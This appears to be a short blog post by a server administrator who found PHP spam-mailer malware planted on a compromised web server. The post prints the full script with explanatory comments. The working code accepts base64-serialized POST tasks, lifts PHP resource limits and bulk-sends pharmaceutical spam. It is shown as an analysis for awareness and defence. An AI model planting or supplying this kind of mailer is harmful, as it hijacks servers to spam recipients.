I found this piece of a PHP malware code on a compromised web server that I started to administer. It’s name was random character string eg. acbjxuu.php. There were about 20 more scripts of this kind. It’s rather very simple script for spaming purposes. For your understanding I’ve wrote what it’s doing in comments between code lines.
if (isset($_POST['task'])) { // be sure to display all PHP errors error_reporting(E_ALL); ini_set('display_errors', TRUE); // disable default PHP memory limit ini_set('memory_limit', '512M'); // disable PHP execution time limit set_time_limit(0); ini_set('max_execution_time',0); ini_set('set_time_limit',0); // get serialized array from POST var named task // example array structure: array(array('to'=>'[email protected]', 'msg'=>'message content', 'subj'=>'Message subject ex. cheap cialis :)')); $x = unserialize(base64_decode($_POST['task'])); // if task variable was wrongly serialized, just die silently... if ($x==false) {exit();} $send_from = base64_encode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']); // now send half a million of viagra & cialis related mails... foreach ($x as $arr) { echo $arr['to']."\r\n"; $arr['msg'] = str_replace('[send_from_url]',$send_from,$arr['msg']); mail($arr['to'],$arr['subj'],$arr['msg'],"MIME-Version: 1.0\r\nContent-type: text/html; charset=windows-1251\r\n"); } exit('SEND OK'); } |
I’ll look in logs for IP addresses that tried to reach for this scripts. Maybe I’ll find something interesting. Wish me good luck and monitor your webserver contents!
